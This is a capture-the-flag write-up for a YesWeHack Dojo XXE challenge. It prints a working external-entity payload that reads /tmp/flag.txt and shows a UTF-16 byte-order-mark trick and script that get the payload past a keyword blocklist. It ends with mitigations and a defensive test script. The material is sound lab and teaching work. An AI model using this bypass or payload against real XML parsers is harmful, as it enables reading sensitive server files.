
[YesWeHack] - Dojo 34

📜 Description

XXE (XML External Entity) injection is a vulnerability in applications that parse attacker-controlled XML with a parser that processes DTDs. By declaring an external entity in the document's DOCTYPE, the attacker makes the parser fetch a local file or a remote URL when the entity is referenced, and the fetched content is then handled by the application as if it were part of the input (for example, echoed back in the response).

πŸ•΅οΈ Proof of Conceptt

In the application, the XXE attack is triggered by sending the following value in the input POST parameter:

/v8APAA/AHgAbQBsACAAdgBlAHIAcwBpAG8AbgA9ACIAMQAuADAAIgA/AD4APAAhAEQATwBDAFQAWQBQAEUAIAByAG8AbwB0ACAAWwA8ACEARQBOAFQASQBUAFkAIAB0AGUAcwB0ACAAUwBZAFMAVABFAE0AIAAnAGYAaQBsAGUAOgAvAC8ALwB0AG0AcAAvAGYAbABhAGcALgB0AHgAdAAnAD4AXQA+ADwAcgBvAG8AdAA+ACYAdABlAHMAdAA7ADwALwByAG8AbwB0AD4=

Decoded (the base64 wraps a UTF-16BE document with a leading byte-order mark), the payload reads:

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///tmp/flag.txt'>]><root>&test;</root>

The vulnerability comes from bypassing the restriction in the application code:

if dataBytes[:2] != b'\xff\xfe' and dataBytes[:2] != b'\xfe\xff':
    # Allow parsing for casual svg: only input without a UTF-16 BOM is inspected
    if any(x in dataBytes.lower() for x in [b'file://', b'tmp', b'flag.txt', b'system', b'public', b'entity']):
        return 'BLOCKED'

If we send the XML encoded in UTF-16, starting with a byte-order mark (b'\xfe\xff' for big-endian, b'\xff\xfe' for little-endian), the outer check fails and the blocklist is never applied. Even if it were, it would not match: in UTF-16 every ASCII character is paired with a NUL byte, so the ASCII substrings b'file://', b'tmp' and the others are simply not present in the raw bytes. The XML parser, however, honours the BOM, decodes the document and resolves the external entity, so /tmp/flag.txt is read. Below is the script that converts the XML file to the big-endian form used in the payload above.

import base64

# Path to a file holding the UTF-8 payload (the file name is an arbitrary choice):
# <?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///tmp/flag.txt'>]><root>&test;</root>
input_file = 'payload.xml'

with open(input_file, 'r', encoding='utf-8') as f:
    utf8_data = f.read()

# Convert to UTF-16BE (Python's 'utf-16-be' codec emits no BOM by itself)
utf16be_data = utf8_data.encode('utf-16-be')

# Prepend the UTF-16BE byte-order mark that makes the filter skip its blocklist
utf16be_data_with_header = b'\xfe\xff' + utf16be_data

# Base64-encode for the POST parameter
base64_data = base64.b64encode(utf16be_data_with_header)
print(base64_data.decode('ascii'))

As shown in the image below, the /tmp/flag.txt file can be read:

🚧 Impacts

XXE attacks can be used to read sensitive information from the application or from the server it runs on. Depending on the parser and the URL schemes it supports, an attacker can read local files (as with /tmp/flag.txt here), make the server issue requests to internal hosts (SSRF through http:// entities), exhaust memory or CPU through recursive entity expansion, and, in specific setups such as PHP with the expect:// wrapper, execute commands on the server.

πŸ” Mitigations

XXE vulnerabilities occur when an application hands attacker-controlled XML to a parser that processes DTDs and resolves external entities. This Dojo also shows why a keyword blocklist is not a fix: the filter inspected raw bytes while the parser decoded the input according to its byte-order mark, so a different encoding hid every blocked word.

The reliable mitigation is to disable DTD processing and external entity resolution in the parser itself, for example lxml's XMLParser(resolve_entities=False, no_network=True) or the defusedxml wrappers in Python, and the http://apache.org/xml/features/disallow-doctype-decl feature in Java parsers. If input filtering is used in addition, decode the data the way the parser will (honouring the BOM and the encoding declaration) before inspecting it, and reject any DOCTYPE rather than specific words. Keeping the application and its XML libraries up to date still matters, since parser defaults have tightened over time.
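The following script, added here as an example and not part of the challenge or the original write-up, ties the proof of concept and the mitigation together: it replicates the challenge's byte-level filter, shows that both UTF-16 byte orders slip past it (and that the big-endian form reproduces the exact POST value above), then applies the two fixes from this section: decoding as the parser would before rejecting any DOCTYPE, and parsing with a parser that does not fetch external entities. It uses only the Python standard library; the function names, the hardened filter and the use of xml.etree as the non-resolving parser are my choices, and the challenge's real parser is not known from the write-up.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample: the XML document from the write-up.
XML = ('<?xml version="1.0"?>'
       "<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///tmp/flag.txt'>]>"
       '<root>&test;</root>')

# The POST value shown in the proof of concept, for a round-trip check.
PAGE_POST_VALUE = ('/v8APAA/AHgAbQBsACAAdgBlAHIAcwBpAG8AbgA9ACIAMQAuADAAIgA/AD4APAAhAEQATwBDAFQAWQBQAEUAIAByAG8AbwB0ACAAWwA8ACEARQBOAFQASQBUAFkAIAB0AGUAcwB0ACAAUwBZAFMAVABFAE0AIAAnAGYAaQBsAGUAOgAvAC8ALwB0AG0AcAAvAGYAbABhAGcALgB0AHgAdAAnAD4AXQA+ADwAcgBvAG8AdAA+ACYAdABlAHMAdAA7ADwALwByAG8AbwB0AD4=')

BLOCKLIST = [b'file://', b'tmp', b'flag.txt', b'system', b'public', b'entity']


def challenge_filter(data_bytes):
    """Replica of the challenge's check. True means the input is blocked.
    Any UTF-16 byte-order mark skips the blocklist entirely."""
    if data_bytes[:2] != b'\xff\xfe' and data_bytes[:2] != b'\xfe\xff':
        if any(x in data_bytes.lower() for x in BLOCKLIST):
            return True
    return False


def utf16_payload(xml_text, byte_order='be'):
    """Encode the XML as UTF-16 with an explicit BOM (the utf-16-be/-le
    codecs add none). Either byte order passes challenge_filter."""
    if byte_order == 'be':
        return b'\xfe\xff' + xml_text.encode('utf-16-be')
    return b'\xff\xfe' + xml_text.encode('utf-16-le')


def to_post_value(data_bytes):
    """Base64 form, as sent in the POST parameter."""
    return base64.b64encode(data_bytes).decode('ascii')


def decode_like_a_parser(data_bytes):
    """Decode the way an XML parser does before tokenising: honour a UTF-16
    BOM, otherwise assume UTF-8. Filtering raw bytes without this step is
    exactly what the UTF-16 trick exploits."""
    if data_bytes[:2] == b'\xfe\xff':
        return data_bytes[2:].decode('utf-16-be')
    if data_bytes[:2] == b'\xff\xfe':
        return data_bytes[2:].decode('utf-16-le')
    return data_bytes.decode('utf-8')


def hardened_filter(data_bytes):
    """Decode first, then reject any DTD instead of blocklisting words.
    Defence in depth only; the real fix is a parser that ignores DTDs."""
    try:
        text = decode_like_a_parser(data_bytes)
    except UnicodeDecodeError:
        return True
    return '<!DOCTYPE' in text


def parse_without_entities(data_bytes):
    """xml.etree never fetches external entities: the reference &test; is
    reported as an undefined entity and parsing fails. Returns
    ('rejected', reason) or ('parsed', root_text)."""
    try:
        return ('parsed', ET.fromstring(data_bytes).text)
    except ET.ParseError as err:
        return ('rejected', str(err))


if __name__ == '__main__':
    utf8 = XML.encode('utf-8')
    utf16 = utf16_payload(XML)
    print('UTF-8 blocked by challenge filter   :', challenge_filter(utf8))
    print('UTF-16BE blocked by challenge filter:', challenge_filter(utf16))
    print('UTF-16BE blocked by hardened filter :', hardened_filter(utf16))
    print('Matches the POST value from the PoC :', to_post_value(utf16) == PAGE_POST_VALUE)
    print('Non-resolving parser says          :', parse_without_entities(utf16))
```

The BOM-sniffing decoder covers the trick used in this Dojo, but a real parser also honours the encoding attribute of the XML declaration and, with libxml2, any encoding iconv knows, so a decode-then-filter check is never a substitute for turning off DTD processing in the parser.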

📚 References

PortSwigger - XML external entity (XXE)
CWE-611: Improper Restriction of XML External Entity Reference

Licensed under CC BY-NC-SA 4.0